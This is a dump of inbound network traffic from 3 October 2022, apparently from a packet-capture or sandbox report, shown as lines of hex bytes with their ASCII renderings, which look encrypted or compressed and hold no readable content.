2022-10-03 14:13:31 UTC	28	IN	Data Raw: b5 2e 0b b8 ca e2 33 64 6f 16 20 43 c0 b7 59 98 83 78 91 20 c5 26 35 47 66 19 21 7d 37 44 86 be f3 f9 db c5 2d 33 43 63 3d 34 30 67 e3 d7 d2 2f cb 6a aa 25 ca bf cd d8 d6 76 23 bb 0a d9 04 51 c7 b6 5f dd 75 a2 a5 6e f4 ef b0 61 28 5d 58 d7 bd 47 9f a9 05 e1 95 66 ce 0c 10 3c fc b1 31 d0 b6 5d d2 28 0a bb 2e 1e 2e 4c 24 a6 6f ab 63 d5 ec 32 1a 71 90 19 91 86 56 47 10 3d 7b a7 4b be 1c d1 ad 92 35 b0 6c ad 00 af 29 88 bf 36 05 6a 3b bf f6 2c ca 64 9c dd aa 57 0e da 6d 44 fd e6 9f 58 61 9d 38 a6 57 8d 21 73 7d 48 64 1f cd ea 80 47 3c 66 40 07 21 11 90 d2 c5 ad f5 ff 0b 23 92 1d e2 ec b0 2b a2 5e ed ba cb c6 63 aa ba e4 d8 d7 db df cd db a9 c6 4e d6 ac 79 ae c2 33 88 43 97 a9 ad 76 49 76 1c f5 3a 21 52 0c 39 aa b1 21 3a 97 3c 1c 0f 29 15 75 ae c8 96 e4 b7 2f Data Ascii: .3do CYx &5Gf!}7D-3Cc=40g/j%v#Q_una(]XGf<1](..L$oc2qVG={K5l)6j;,dWmDXa8W!s}HdG<f@!#+^cNy3CvIv:!R9!:<)u/
2022-10-03 14:13:31 UTC	29	IN	Data Raw: d5 4f 45 56 cf 49 4c c1 16 a5 37 4a 14 0d 94 86 ac 7e 8b c3 1e 4b 05 8d 6d 14 cf 20 f8 29 fe 9a 00 20 21 38 cc 5e e5 1e 8b 54 6e 1a 1d af 14 74 a7 19 e0 76 84 de 68 48 85 cb 57 85 2b 25 e6 eb 65 8f 39 f9 26 12 f0 a5 34 0d 9d 2b 0e 4a 13 07 bc c6 d6 aa 57 9a 48 d6 3e 24 ba 28 46 0a 68 3d b3 f3 2e 6c 7e f4 9b 2c 5e d0 84 ac 2c 4d 8e 8c a5 66 d6 b4 e7 67 15 f3 73 84 9a 53 8e 55 32 09 17 cf 62 1e 76 29 68 eb 58 31 59 db c3 21 01 a6 48 1c 7a de d4 3f 98 77 4a 56 a9 5c f3 65 bd f8 64 0e 2c 0d 21 73 1e 71 4b 20 cd 0a 0f d7 6c 6e 3b 75 61 ba 2a d9 f4 79 12 7f 1a ef 9d 88 58 8d 25 3e e1 af 6f e1 d8 9c b8 c0 4e e9 9e 72 2f 7a 09 51 54 34 be e2 2d 24 20 c0 f0 75 17 62 77 80 95 9f a9 12 db af e5 72 62 e5 18 a7 43 fa 7e 23 7d 56 94 d5 71 e2 ca d5 5d 64 08 6a 75 bf ae Data Ascii: OEVIL7J~Km ) !8^TntvhHW+%e9&4+JWH>$(Fh=.l~,^,MfgsSU2bv)hX1Y!Hz?wJV\ed,!sqK ln;ua*yX%>oNr/zQT4-$ ubwrbC~#}Vq]dju
2022-10-03 14:13:31 UTC	30	IN	Data Raw: 1c a2 5f f9 35 5f 18 5b 94 8b 50 5e 85 74 84 9c 3e 7b ee a3 d6 ad 92 9a 43 a1 89 85 dd d2 32 73 20 03 d3 59 13 9a 8f 67 ff c2 15 f8 3a e8 ea 1f 28 0b 97 74 03 dd 2e 01 b7 f3 0f 23 68 14 6e 24 6b 38 a7 48 8f 8a 2d 1e 22 c5 24 57 02 76 16 56 1d 35 52 b1 a2 e5 87 64 b8 43 39 50 63 14 b1 18 29 e3 d5 cf 61 ef 63 c5 74 c2 a9 f6 a8 0f 67 32 b7 1b a4 73 71 d6 b4 36 0b 5b 74 be 13 49 fe b8 b6 32 37 90 d2 95 a9 e0 d9 03 8e c7 76 c6 10 4e 3c fe b3 40 80 a7 5b b9 e3 15 95 f2 22 f0 44 39 a6 06 23 64 c4 ec 55 6a 60 ff 77 4c 8e 4f 45 24 56 68 b6 ae ee 13 68 f3 45 e3 b0 e6 06 7b f3 28 a0 e3 b9 b2 5f 0e 18 08 d3 c8 22 bf dd aa 4c 3e d3 6d 1b bd bd bc 0b 61 9d 29 a2 7f 6f 60 28 6f 6b 39 36 f0 e0 a8 16 10 61 4d 07 fa 13 90 de cb 9a dd c2 01 30 9c 20 e4 f1 44 3d 92 70 9e fa Data Ascii: _5_[P^t>{C2s Yg:(t.#hn$k8H-"$WvV5RdC9Pc)actg2sq6[tI27vN<@["D9#dUj`wLOE$VhhE{(_"L>ma)o`(ok96aM0 D=p
2022-10-03 14:13:31 UTC	32	IN	Data Raw: 1b 29 4e 20 86 f7 e5 4d 57 9a f8 eb 6d 1f ad 78 92 34 57 da 94 69 f7 d9 5d bc ee 61 f8 c1 74 94 a9 ef 87 19 a4 c0 28 8f 0f 92 65 8c aa 12 13 71 05 6c 3a ad 9c 2c 5b 56 56 84 46 4f c1 1c df 55 e4 0f f3 93 a1 a3 45 1c a6 1e 4b 1d 99 69 6f 88 26 e7 3b 7d ea 2c 39 26 3d b5 00 8a b8 8f 3b 0b 66 7b a5 05 74 73 a4 b5 f8 84 de 66 7b 9f df 2f b1 3a 23 f3 83 eb 8e 15 e9 0f 61 ad ab 31 74 e5 3d 06 c0 a3 7e b9 aa d6 a0 4c 8b 59 ab 64 35 bc 32 d7 68 45 31 bb 48 2f b2 17 f4 9d 24 46 d7 93 d7 42 5c 88 97 ab 96 d3 e5 b6 65 6e ad 74 8a 9a 32 6c 64 32 0d 14 db 08 93 73 3f 71 bc c6 5b 06 cc dc 6e f2 d4 4c 04 69 fa ab 47 eb 6d d6 43 ae 54 ed 74 4e 49 61 15 3c 94 5f 1f 08 6d 2e 5a ca 65 a0 c8 66 7b 3f 0e 28 bc 35 d6 0d 17 5a 74 3a e5 92 a2 4b b0 3f 32 2b a9 6f f0 8e 8b 46 d0 Data Ascii: )N MWmx4Wi]at(eql:,[VVFOUEKio&;},9&=;f{tsf{/:#a1t=~LYd52hE1H/$FB\ent2ld2s?q[nLiGmCTtNIa<_m.Zef{?(5Zt:K?2+oF
2022-10-03 14:13:31 UTC	33	IN	Data Raw: df 06 a3 89 e3 84 b5 c7 3b 7f fa 46 58 2f 0f c8 65 2f 2f f9 15 c1 85 ad bf 09 3d 51 57 6b 44 9e ec d3 3c 76 13 90 8a ed 52 99 83 57 f6 e6 32 dd 04 97 13 96 ff d2 4d 57 ba e7 5c 63 20 e9 ed 54 72 f3 7c 86 98 2f 61 87 27 cc 53 95 d8 25 c9 f2 df d9 c3 27 42 2a ff b4 59 3b 1e 9f 76 e4 d0 70 ff 42 e8 ee 04 26 01 8f 1c 7e a5 28 1e a7 1c 1f 1e 7e 6b 7e 7e 6b 3c b2 5e 10 38 e6 5a a2 c4 20 4c 05 7f 76 53 70 35 58 aa a6 e7 90 6b d4 2b 26 48 99 04 8c 27 65 98 8f c5 1c 84 75 ed f0 ca bf cd a1 06 19 5b b1 19 d5 30 68 c5 b6 30 05 73 b9 51 1b b3 e6 ce 01 3b 58 4d de 89 b0 9b a9 12 88 d4 99 cf 2a 7c 31 ef b7 3b cd a1 44 ae 1b 0b 97 06 31 82 c8 28 b7 6d 85 67 bf 8d 5d 7b 75 ff 8d 4d 8e 43 6b ba 79 79 b5 6e e5 74 c6 fa 93 3f a5 f4 17 06 af 39 a6 f8 22 fb 61 3f fc f5 57 9a Data Ascii: ;FX/e//=QWkD<vRW2MW\c Tr\|/a'S%'BY;vpB&~(~k~~k<^8Z LvSp5Xk+&H'eu[0h0sQ;XM\|1;D1(mg]{uMCkyynt?9"a?W
2022-10-03 14:13:31 UTC	34	IN	Data Raw: e3 29 4d 3c a1 f1 7f 77 1a 08 a3 f0 9e ad ce 9c 4b e5 72 62 ff 78 ad 3a fa 74 3a 65 48 80 f9 16 f2 ce c1 ae 6d 32 4f 7a c0 e2 18 99 3e f0 20 8b cd 91 5e 65 fb 29 91 c0 81 e2 96 ac 00 67 02 08 5e fb f0 58 ed 63 58 b2 45 5b 13 a3 68 c9 71 43 03 24 40 b9 93 77 97 85 02 26 ee bd 2c 51 c8 cd ed ad 38 65 f8 c6 2b d0 25 f2 ae 45 2e 28 92 92 19 37 99 69 98 ca 8d 90 f0 c9 c0 b0 c9 6a 97 d3 aa 09 9a 6b 21 93 f1 cf cf 68 3b 61 fe d6 b2 16 25 58 55 d0 33 bc 7a de 20 a2 91 f7 a6 b5 c7 35 76 c1 d4 5f 2f 14 d8 60 4f a9 f8 39 d7 98 c6 f6 0d 3d 44 50 0c df 9f c0 c0 16 8d 48 90 80 ff 55 db d3 d7 f7 ec 27 db 0f fe 6b 87 f9 c0 ae 45 92 ec 4e 1c 4e f1 13 51 72 ff 67 ee c4 2f 70 85 27 da 20 a5 f4 3e ca 84 8c cf e3 dc 62 2a 7e 28 50 04 be 61 76 ee c6 f4 99 22 c8 11 0e 39 1a 00 Data Ascii: )M<wKrbx:t:eHm2Oz> ^e)g^XcXE[hqC$@w&,Q8e+%E.(7ijk!h;a%XU3z 5v_/`O9=DPHU'kENNQrg/p' >b*~(Pav"9
2022-10-03 14:13:31 UTC	35	IN	Data Raw: 90 48 62 cd 43 c3 57 1d 65 3e 25 f5 c0 e1 32 fd bb 14 3d 77 42 30 d3 ed 91 f8 e7 96 9a 91 00 30 9c 13 fe f5 66 39 9b 60 fa 44 c0 c2 86 b0 a9 ea d2 ee e4 c0 c1 2f 76 ea 43 ed a8 62 16 15 22 8d 6f 9a 80 c8 76 54 7e 03 e1 c4 20 7e 01 3e 64 f7 96 13 25 c2 e3 f1 dc 02 4e b1 c8 87 e6 aa 2a af aa b6 d8 39 13 b6 b4 84 5e ad 13 c6 2a 96 4f d1 ce 98 fc 6a 71 61 82 00 ae 4e b4 80 18 57 8a ed cf bd 34 bc 74 a5 aa 6d 5b 72 3e 60 7b 24 5e 88 59 a8 da 40 76 06 0e f0 94 50 9d b8 39 89 83 0b 8f 22 59 05 6a 24 dd 19 6d 61 82 d6 b9 d7 3e b6 22 a9 cd b9 9a 67 6d 2c 07 10 b1 7a 0f 94 20 ce ef c8 9b c7 2f e5 e8 2b e0 f1 6c c4 21 b8 47 cf 94 d3 e6 4b 4c 88 06 fb 45 02 44 6a b6 36 6d d7 b3 1c f6 27 8e a1 db 6c 98 fb 8f 33 d1 ab 97 47 22 16 ec a5 0f 92 2c bc ae 03 78 78 2e 77 62 Data Ascii: HbCWe>%2=wB00f9`D/vCb"ovT~ ~>d%N9^OjqaNW4tm[r>`{$^Y@vP9"Yj$ma>"gm,z /+l!GKLEDj6m'l3G",xx.wb
2022-10-03 14:13:31 UTC	36	IN	Data Raw: 7b 16 19 86 51 0d 0d 79 41 33 c2 7a a6 29 6d 44 28 0b 42 dd 2a dd f7 03 18 3e cc e5 9a a2 54 b0 33 36 38 be 67 fe 81 62 b9 fd 43 91 c8 6d 25 a8 36 13 5e 1c 48 ee 32 28 40 a8 f1 64 15 07 60 00 f1 b2 a6 1b bc d7 32 5a 19 e8 66 c8 51 fc 6b 24 69 4c 93 ec 1e fb 34 de 7c 60 1d d6 cf a1 87 83 98 3a e6 11 19 c4 91 45 7b fe 5d 17 c1 ad e4 81 b4 14 5d dd 19 5a e0 11 45 d2 73 5a d8 17 44 0b 59 76 c9 02 6e 82 2d 5f a7 53 41 76 fc 02 2c cc 2e 3e 55 c2 a1 86 b2 2d 9f e6 f3 32 a6 44 e3 a6 5e 29 c9 85 ad 11 3e 97 75 c3 32 8d 6e 23 c1 ce d8 9b 6a 86 df b1 34 e6 6b 0d 95 f6 d7 b7 50 f4 9f 0b 36 a3 13 32 50 44 c5 24 a4 7a de 20 b6 8b 9f f4 b5 d6 39 7f fd ab 5f 03 0e cd 72 3f db 2e 11 ac 86 d6 ef 1a 38 4a 41 03 29 9e fd df 0b f8 ec 91 ac ea 4f 8d 93 57 f6 e8 38 a3 57 77 ed Data Ascii: {QyA3z)mD(B*>T368gbCm%6^H2(@d`2ZfQk$iL4\|`:E{]]ZEsZDYvn-_SAv,.>U-2D^)>u2n#j4kP62PD$z 9_r?.8JA)OW8Ww
2022-10-03 14:13:31 UTC	37	IN	Data Raw: 05 69 87 65 ec 1c 5d 7b 7b 92 68 17 8e 45 47 54 fc 78 bf 72 73 4e be fa 92 23 92 1c 04 00 a5 04 a4 f1 3d db 13 11 f7 ff 51 9d 08 bf d9 a8 46 0a cd 07 0e 0a aa 6a d5 50 9d 38 a7 2a 41 61 28 61 62 45 44 cd e0 ac 15 2b 09 3d 2e c4 19 b6 d6 96 c4 f5 ff 05 32 ed 50 e6 e6 6a 2f 9b 6c 5a d5 80 ef 85 a2 9c e0 a9 a5 ec df c9 d8 61 a9 3f fd ad 6f 88 d5 3b 56 52 95 e8 9a 76 45 72 73 96 3b 21 58 1a 53 5f 11 df d7 4d e2 10 26 f5 17 5d b3 e0 a1 ee b5 33 8f ab 8c ff 2e 3f e6 af c7 9e 50 ec 39 35 90 5c d9 ce 3f f5 75 6e 57 82 2c a2 41 e4 96 65 17 8a ed ca b1 24 ad 7c 8d bb 65 46 84 3f 4c 60 30 2e f9 42 a8 d9 5b 96 14 2a f2 9d 53 82 b5 d1 76 ae 2b 8e 65 47 78 01 3c 23 1c 5e 68 ba dc 92 25 34 d2 5d 57 cc 91 be 77 0d 3c 02 12 cc 1d 0f 94 24 d1 f5 fb d8 83 7c a0 df a3 1f f0 Data Ascii: ie]{{hEGTxrsN#=QFjP8Aa(abED+=.2Pj/lZa?o;VRvErs;!XS_M&]3.?P95\?unW,Ae$\|eF?L`0.B[Sv+eGx<#^h%4]Ww<$\|
2022-10-03 14:13:31 UTC	39	IN	Data Raw: dc 42 44 94 76 a3 44 d6 e2 a1 7c 18 f7 7d 9c 60 2f cd 57 25 00 15 c1 12 8b 88 28 42 ee 71 48 28 5f d4 2e 45 cf 4b 19 3a f7 a5 4f dc 75 5c 59 ae 6b b8 77 04 0c 61 44 22 39 d9 0c 34 71 41 31 fa 67 aa ea 6c 68 39 69 39 ba 3b cb ff 3d 59 7e 12 fd 64 a3 67 b0 5e ef 38 af 6b 92 15 9d b8 db 47 8b cc 72 27 69 e0 63 73 1e 5a ef 2d 2a 45 5e f0 59 1f 0f 7f fe f8 87 57 19 98 cb cf 70 43 26 61 c0 2d 64 75 30 70 6e 93 fd 16 f0 fa dd 50 0c 1e 58 78 d3 b8 18 88 2c ea 23 52 cc 99 43 8d e0 6a eb d8 8d e8 81 bd ed 62 2e 1d 4e eb 17 55 c1 73 41 37 1e 77 1e a0 18 7a 1a 6b 8b 3d 73 85 92 43 e4 f1 02 2e fe 5f 3e 79 cc c5 c3 a9 21 9b f1 f3 df af 68 fe ac 53 23 1f 24 80 1d 3d a5 ba 9d cb 73 99 ca 20 c3 e7 91 7d 9b d7 a6 3d e6 6b 0d 9b cc d3 8b b6 21 4b ef f9 be 05 17 58 44 d4 2c Data Ascii: BDvD\|}`/W%(BqH(_.EK:Ou\YkwaD"94qA1glh9i9;=Y~dg^8kGr'icsZ-*E^YWpC&a-du0pnPXx,#RCjb.NUsA7wzk=sC._>y!hS#$=s }=k!KXD,
2022-10-03 14:13:31 UTC	40	IN	Data Raw: c7 b1 6d 5b 22 b1 13 a5 33 76 00 a7 ea 03 a3 2f 9e 1a 9f ee bd 69 2d 43 d5 db 82 a1 29 35 0a 97 c0 d3 52 00 69 20 e6 b6 13 25 a7 5b b7 ec 03 35 93 2b 23 97 44 94 69 87 64 c4 ea 5d 0b 31 cb 3b 77 8e 45 49 8f e4 70 b6 f6 48 0c 64 ff b3 35 bb e0 04 5d 1b b4 a9 cd 37 05 60 00 d6 f2 2c 49 08 bf dd c6 57 0e cb 45 81 bd bd b6 5a 0e cb 38 a6 5d 10 68 a6 d2 40 c1 1e cd e0 99 17 15 22 48 2f c2 60 a1 d5 ed 94 8f d7 54 30 96 06 e5 89 38 39 8a 62 e1 b2 4f 59 a5 57 ba e2 d2 ce e7 f7 89 d3 77 c0 3b cd ac 65 a4 b8 28 81 fe 20 45 c8 f8 f2 a0 0b 2f 2d f7 df 3d 39 62 78 2b 2e a4 2b 80 08 d4 1e d3 0e 7c 0a e7 a3 3f 49 a2 14 62 00 ec a7 b3 cd 98 48 e5 b7 82 54 54 57 79 3d 68 7d 78 99 9a 25 2c fa 32 9e eb 85 a2 14 cb a2 1e a9 56 a5 bb 65 55 bc 3b 4c dd 26 25 d2 34 a8 de 5d 7e Data Ascii: m["3v/i-C)5Ri %[5+#Did]1;wEIpHd5]7`,IWEZ8]h@"H/`T089bOYWw;e( E/-=9bx+.+\|?IbHTTWy=h}x%,2VeU;L&%4]~
2022-10-03 14:13:31 UTC	41	IN	Data Raw: 62 62 a0 20 29 b1 2d 03 fa 85 12 a7 0e fd 0d 10 29 ab 20 77 d4 ad 0f 4e 14 07 c3 d1 0f aa 53 99 c4 1a 73 fe ad f6 3a 66 7a 36 81 84 40 11 17 f6 e0 f1 59 de 84 c0 49 d7 9d 85 a0 13 0b c9 8a 63 04 fc 63 5c 04 3d ed 57 49 d7 15 c8 09 ae 38 38 68 fd 56 5e 2b 35 c1 25 68 d3 c4 1b 70 66 bb 56 e6 63 62 ce ab 4e f8 48 78 58 64 04 3b 04 5a 32 f1 73 41 24 dc e8 ad d7 6c 69 2d 1a 2d 92 b6 dd f3 1c 5e de 1a e5 90 b3 46 c9 0f 3e 38 ad 6d 9a 5e 9c b8 d5 64 44 c0 72 29 6d 14 49 18 0d 44 f2 21 36 7b 4e f3 75 1b 0e fe f9 f0 9e a8 0c a0 dd cc ee 68 e9 6c ea e8 fa 74 3a 6b 48 87 d5 f9 e1 ca d9 46 e1 19 58 78 ba ac 0c 8d 12 7a 08 0a c6 b9 f4 73 e1 4c f8 cd f5 c7 89 a5 11 77 2a cf 5a e0 08 4a cb 6a 50 df 31 54 10 b6 7d ed 33 87 81 25 46 95 93 7a ff d6 0d 37 ef b6 e9 46 c3 cd Data Ascii: bb )-) wNSs:fz6@YIcc\=WI88hV^+5%hpfVcbNHxXd;Z2sA$li--^F>8m^dDr)mID!6{Nuhlt:kHFXxzsLw*ZJjP1T}3%Fz7F
2022-10-03 14:13:31 UTC	42	IN	Data Raw: 25 29 2a e0 1e 34 0b bc 05 24 61 1a a7 52 98 9e 5e 1d 97 c4 20 4c 7c b2 19 2b 7a 13 43 bb a4 22 85 65 d4 23 28 49 59 53 5f cf 98 eb f8 f5 0d 8b 4b 30 72 cb b9 a8 62 1e 76 29 97 08 d4 3e 7b c2 98 c2 16 75 a4 b9 97 98 ef b0 61 2f 4c 5d fa 09 a3 9d a3 2b 9f c3 67 c4 69 c3 28 fc bb 1d cd ac 73 fa e7 0a bd 4b e6 f9 92 22 91 67 82 75 cf 85 3a 7b 71 9a 42 43 8a 03 6f 32 7c 59 04 79 ff 1b ea d1 97 31 a5 b0 50 08 87 cd a0 e7 3d 29 32 02 e2 e0 b6 d3 18 bc cc ba 06 1f ca 72 ee d2 db bd 58 6b 8e 37 b7 58 08 5a 9b 65 60 3e 0f dd f1 a7 0b eb 09 47 2e c4 19 94 fc 1f 9e f5 f5 2d 3e 95 1d f6 f0 7f 36 e5 64 ec ba cb bf ae ba b4 e6 94 d3 e5 db ed 6a 76 c6 48 a8 86 61 aa dd 61 dc 5b e9 9b df 4c 2a 10 1d f5 30 32 43 1d 28 77 4a 61 2b ba 6d 0d 0a d4 8d 4e ab d9 84 f1 8f 56 37 Data Ascii: %)4$aR^ L\|+zC"e#(IYS_K0rbv)>{ua/L]+gi(sK"gu:{qBCo2\|Yy1P=)2rXk7XZe`>G.->6djvHaa[L02C(wJa+mNV7
2022-10-03 14:13:31 UTC	44	IN	Data Raw: a8 45 50 b6 05 46 e9 e0 de 44 e4 67 cd 93 8d a1 07 f4 b1 63 95 01 8a 6b 6d 9c 2e fc 05 5a eb 00 26 58 e0 ce 5a 8e 92 8b 54 68 74 4b ab 14 ba a9 1c c8 93 84 de 62 66 a0 db 29 b1 21 27 fa eb fc 8f 39 f9 0f 0c 8a 41 31 70 e9 29 0d 33 f6 11 c1 ae d4 ae 2e 7e 4a ad 60 26 9a 2c 69 68 69 b0 88 4b 40 10 6a 10 9b 28 5d dc f3 10 43 4d 84 f5 42 68 d2 cd 88 1c f5 f7 74 8e 9c 41 40 54 32 07 17 bb cc 83 76 23 13 0d 5a 4a 07 d9 b8 c4 6e c5 4d 1e 1f c7 bb 42 f8 75 31 b2 ab 4e f6 62 a9 bc 64 0e 2e 1e 4c 61 fa 71 41 26 44 d2 c5 15 6d 68 33 0c 42 5b 2a dd f7 14 0d 9a 1a e5 9e b4 49 c6 c4 3e 38 ab e1 56 e7 5e b9 d1 46 90 bb 92 2f 7e 1a 76 a1 1a b6 e3 2d 24 20 63 f0 75 17 77 b7 ff f0 94 ab 63 55 c9 e4 76 7c 17 60 36 42 fa 72 43 b9 45 93 f7 79 27 cb df 5a 6e 09 25 9d bb b8 1c Data Ascii: EPFDgckm.Z&XZThtKbf)!'9A1p)3.~J`&,ihiK@j(]CMBhtA@T2v#ZJnMBu1Nbd.LaqA&Dmh3B[*I>8V^F/~v-$ cuwcUv\|`6BrCEy'Zn%
2022-10-03 14:13:31 UTC	45	IN	Data Raw: 9c 56 96 e6 40 12 42 ec ed 41 5b 97 9b 94 b2 2c 67 92 3d d6 bc 91 eb 34 35 88 a9 db e8 26 5a 05 81 4b a6 39 80 9c 6d de c4 68 ab 3a e8 ee 75 39 1a 8d 0e 75 a0 24 02 b5 96 6a 32 64 68 16 20 79 38 9e f9 9f 8f 5a 63 26 cf 0c 41 15 13 6d 2b 70 34 78 b6 9b 3d 97 6b cf 3b a3 5b b9 0b 85 18 51 e3 d5 cf 11 a8 54 c5 70 c1 61 c7 b0 34 76 22 a1 19 df 2f 71 f6 b0 3b 3f 75 ac 1c 1a 9f ee a3 50 3e 58 06 d7 95 a3 e1 a9 03 9f d5 74 d5 3e 3e 2c fc b1 3b cd bc 44 89 1b 0b 97 36 1b 33 93 28 bd 78 82 0b 0f eb 5d 71 62 89 0c 78 9d 5e 43 2a 63 66 a1 86 fe 37 b0 f8 82 3e 92 2c 05 00 a5 3b ae f8 28 16 7b 13 f7 ec 33 e2 f6 be f1 a4 55 1f d1 45 18 bc bd b6 4b 65 82 1b b5 4c 1d 70 33 7d 9e 3f 32 cb f6 bb 17 24 75 51 2f d5 08 8f f5 13 9f d9 f4 10 3b 87 02 30 f5 65 26 a8 7b f6 ba d0 Data Ascii: V@BA[,g=45&ZK9mh:u9u$j2dh y8Zc&Am+p4x=k;[QTpa4v"/q;?uP>Xt>>,;D63(x]qbx^C*cf7>,;({3UEKeLp3}?2$uQ/;0e&{
2022-10-03 14:13:31 UTC	46	IN	Data Raw: 2d 49 c5 9a 25 e7 76 49 9c e9 f1 41 71 52 79 b4 25 75 c1 bf 23 08 37 b9 bc c0 97 a1 6a 62 dd 28 96 5e 60 f7 9b a1 a5 0f 93 65 b9 b1 23 7d 68 05 7d 79 b2 b0 c3 4c 69 45 94 e3 4c c1 16 dd 55 e9 05 15 fd 54 ab 7d fc b5 09 54 2c 99 74 6f 88 3b e7 15 7d ea 2c 27 34 25 c5 45 b3 ab 90 54 79 7c 6c 51 15 5c aa 04 db 88 84 cf 79 7b b1 32 28 9d 21 56 d1 97 15 89 33 e2 37 09 ec ab 20 6b f2 32 f0 4f 38 1b d0 a1 cc 7c 40 96 55 b7 77 3f ba 3d 32 76 73 c3 b8 67 4e 13 06 ff b3 e4 58 de 8a c2 52 52 95 9b b9 68 c3 d2 9c 99 14 db 77 9d 8d 35 e1 44 29 12 2a 36 0c ae 74 02 6b d4 e0 b0 fc 24 e9 25 75 f5 4c 1c bc 64 ba 42 8f 77 4a 43 bd 5d fd 64 fa 13 66 0e 2c 67 80 1a 1e 7b 6d 24 d5 41 b9 d8 47 2d 3d 26 75 b8 2a db 9c d8 76 7e 10 c8 b1 a6 63 f0 22 3e 3e c0 a1 e1 88 96 94 d3 67 Data Ascii: -I%vIAqRy%u#7jb(^`e#}h}yLiELUT}T,to;},'4%ETy\|lQ\y{2(!V37 k2O8\|@Uw?=2vsgNXRRhw5D)6tk$%uLdBwJC]df,g{m$AG-=&uv~c">>g
2022-10-03 14:13:31 UTC	48	IN	Data Raw: 24 82 93 8c f6 6b c7 27 ed d8 55 5e 2e 34 ca 5a 30 b7 f8 39 ee c0 a5 05 08 3d 5f 47 15 3e 8e 61 e6 14 f6 13 83 86 ea 4f f5 94 b6 f7 ec 27 dc 12 80 15 e8 22 cb b3 5c 87 e9 48 77 8d e8 ed 5a 4f 84 60 fa 43 2e 70 8b 29 d3 c2 4a f5 3e c1 8b 93 db 4d 94 0d f5 7f b4 53 00 99 8f 71 c4 d0 e5 a1 3a e8 ef 24 3f 30 9d 0a 7e b4 2e 01 82 e2 0b 74 64 66 20 24 6b 3d a5 69 9b 8f 82 72 22 c5 a0 46 13 76 0f 38 74 0d 91 b5 b3 f4 96 7a c1 34 c7 51 4b 0b b6 32 08 e8 d4 c5 16 97 b9 c8 7c d1 ac c3 b7 0f 72 3f 4f 18 f3 28 79 ce 66 3c 09 66 a6 af 0b 9b f7 4e 61 17 74 4b bd 9e a2 9d a3 6f ad c3 67 ce 06 7f 29 fc f1 60 ff a7 5b bd e5 0a bb d4 0c a0 ba 12 b7 69 8d d3 d3 3c d0 4a 71 90 12 47 97 56 47 3b 69 7d a2 86 fe 37 b9 f2 9a 04 99 fe 17 04 af 39 a4 fd c9 04 4c 16 cd 18 37 d3 0c Data Ascii: $k'U^.4Z09=_G>aO'"\HwZO`C.p)J>MSq:$?0~.tdf $k=ir"Fv8tz4QK2\|r?O(yf<fNatKog)`[i<JqGVG;i}79L7
2022-10-03 14:13:31 UTC	49	IN	Data Raw: a5 18 d9 9a fd 88 af 0d 3b 61 42 0b e6 25 dd 17 61 67 8e ce 34 f7 36 a9 3a 44 c3 84 91 7b 1d 2c 0d 68 d3 0d 27 6d 24 d1 ff c4 b3 4a 0f ed f7 3a 0d e0 51 c7 1c 3c 48 c8 98 fb ce a3 44 9e f2 eb 64 10 43 16 5f 37 7c d5 bd 35 19 29 cd 78 f1 69 aa 57 7e db 41 5d 85 77 2b 07 9d bc 60 4f 77 bc a4 03 63 1c db 6d 62 a7 8d 39 5b 54 54 32 9e 22 1e 1d df 4e f1 00 1c 86 03 1c 6e e4 b7 0c 54 11 50 7e 61 43 33 eb 3c 8d fc da 37 f3 b2 ff 5a 8a b9 98 45 79 73 6a bd 05 63 73 0d d9 85 95 cf ec d3 a0 35 29 b1 21 56 34 97 15 85 2a e8 1c 0f e6 ba 5e a4 ed 2b 04 5d 02 00 d7 82 1b ab 53 97 62 e4 66 24 bc 04 d5 68 69 3b d6 06 40 11 1d e7 8c 21 79 d0 00 d1 42 0d 4e 88 a2 68 cd d9 07 56 15 f7 75 99 85 3f f5 44 29 12 05 e0 d9 83 76 23 6d 9f 8f 4b 03 d1 d0 3c 7f dc 58 07 1f b2 ba 42 Data Ascii: ;aB%ag46:D{,h'm$J:Q<HDdC_7\|5)xiW~A]w+`Owcmb9[TT2"NnTP~aC3<7ZEysjcs5)!V4*^+]Sbf$hi;@!yBNhVu?D)v#mK<XB
2022-10-03 14:13:31 UTC	50	IN	Data Raw: 58 61 9a 3a a6 57 e8 61 28 65 9c 3c 1e cd ec a8 1c 3d 66 4a 2f c4 11 90 d4 ed 34 f6 ff 01 1f 96 0c e6 3f 6d 39 8a 64 ed ba c1 ee 85 a8 ba e2 d2 ff ec d9 cd d1 77 2d 4b fc ad 94 ad c2 31 87 70 97 93 e5 76 45 77 0f c5 3f 21 dd 0c 39 62 fd 21 28 a3 2a 0f 0a fb 97 5d b9 c8 96 ff b1 2e af aa b6 d6 30 06 a3 b3 d6 9a 4a 12 38 19 8a 55 c6 ee 5f f9 6e 7d 9b 83 3d a6 54 1a 97 49 39 88 e4 e3 2c 15 af 76 ae a1 76 42 8c 2e 48 6a d8 24 fe 49 af c9 26 b2 a2 11 26 08 69 82 b2 c6 84 b3 14 88 72 5d 7c 1a da dc 31 7d 68 98 b4 b1 d0 5c ae 13 be cd 95 9e 79 2e 39 02 6f c8 05 f1 95 08 d7 ea bb 9e de 2d e9 f7 2a 1a e6 be c3 26 2e 4f cd 83 db f7 5e 59 60 f9 d6 6b 2a 56 41 c5 c9 83 20 a4 12 08 35 92 af f0 18 a4 46 73 49 2e 81 95 61 32 19 a8 f8 0b 92 76 bc bf 1d 75 8d 04 40 1f b9 Data Ascii: Xa:Wa(e<=fJ/4?m9dw-K1pvEw?!9b!(].0J8U_n}=TI9,vvB.Hj$I&&ir]\|1}h\y.9o-&.O^Y`k*VA 5FsI.a2vu@
2022-10-03 14:13:31 UTC	51	IN	Data Raw: 02 3c 1f d2 0b 12 66 57 be db 69 b2 c0 f0 79 35 17 2f 26 3b d1 e9 00 ea 6f 16 f2 b2 00 4b bd 2a 18 27 a2 7c ee 88 8d b7 c7 b2 93 ec 71 38 6d 11 62 4e 13 5d ff d3 23 7f a2 da 70 25 86 88 01 0f 98 dd 27 b4 c9 e6 58 52 eb 4e d5 42 fa 7e 32 79 2b 94 fc 16 e5 e0 cc 60 6e 1e 65 78 bb b8 9e 99 3a f7 1e 06 e7 bb 54 7b f6 b8 e8 ec 83 f0 85 a5 1b 7b fc 18 76 e8 7d b7 c0 7b 50 c2 06 57 13 af 61 1b 1a 47 83 32 4c b3 8d 70 06 fc 2e 24 cf a3 14 81 cf de 92 b5 2c 9b fd 85 ea af 44 f8 84 41 22 37 97 b1 1f 37 bf 6d 87 c7 f5 91 dc cf d4 c7 b8 40 97 df b6 df 19 46 29 ea 09 d0 a0 1a 30 78 f8 c9 b4 12 df 59 68 d6 34 bf 84 d7 1a 4b 92 a0 fe a2 cb 31 68 f0 ab 5f 03 1c e5 78 0b 05 fa 42 d5 86 d6 e1 23 3d 46 64 